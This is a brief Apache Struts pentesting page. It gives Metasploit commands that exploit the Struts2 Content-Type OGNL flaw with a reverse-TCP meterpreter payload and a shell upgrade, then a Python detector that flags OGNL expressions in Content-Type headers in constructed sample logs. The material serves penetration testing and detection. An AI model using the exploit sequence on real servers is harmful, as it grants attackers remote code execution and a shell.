# Apache Struts Pentesting

Apache Struts is an open-source web application framework for developing Java EE web applications.

### Struts2 OGNL Evaluation

Metasploit's `multi/http/struts2_content_type_ognl` module exploits this issue.

```
msfconsole
msf > use multi/http/struts2_content_type_ognl
msf > set payload linux/x86/meterpreter/reverse_tcp
msf > exploit

meterpreter > shell
SHELL=/bin/bash script -q /dev/null
```
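The module above delivers its OGNL expression in the `Content-Type` request header, so a defender can flag header values that carry OGNL syntax or that are not a valid media type. The following is an added detection example, not part of the original page or of Metasploit; the tab-separated log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# A legitimate Content-Type is "type/subtype" plus optional ;name=value parameters.
MEDIA_TYPE = re.compile(
    r'^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+'
    r'(\s*;\s*[A-Za-z0-9_.-]+=("[^"]*"|[^;\s"]+))*\s*$'
)
# OGNL expression delimiters and object names that never belong in this header.
OGNL_MARKERS = re.compile(r'[%$]\{|#_memberAccess|#context|ognl\.|@java\.lang', re.I)

def classify_content_type(value):
    """Return 'ognl', 'malformed' or 'ok' for one Content-Type header value."""
    if OGNL_MARKERS.search(value):
        return "ognl"
    if value and not MEDIA_TYPE.match(value):
        return "malformed"
    return "ok"

def scan(log_lines):
    """Return a list of (client, path, verdict) for suspicious requests.
    Assumed log format: client<TAB>method<TAB>path<TAB>content-type."""
    findings = []
    for line in log_lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 4:
            continue  # not a line in the assumed format
        client, _method, path, ctype = parts
        verdict = classify_content_type(ctype)
        if verdict != "ok":
            findings.append((client, path, verdict))
    return findings

# Constructed sample log lines (documentation IP ranges, harmless marker expression).
SAMPLE = [
    "198.51.100.7\tPOST\t/upload.action\tmultipart/form-data; boundary=----abc123",
    "203.0.113.9\tPOST\t/index.action\t%{#constructed_marker}.multipart/form-data",
    "203.0.113.9\tGET\t/index.action\t",
    "192.0.2.44\tPOST\t/login.action\tapplication/x-www-form-urlencoded",
    "192.0.2.50\tPOST\t/login.action\ttext/html charset=utf-8",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit on `ognl` against a Struts endpoint warrants checking the application's Struts version and the host for signs of command execution; `malformed` hits are lower-confidence and mainly useful for triage.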
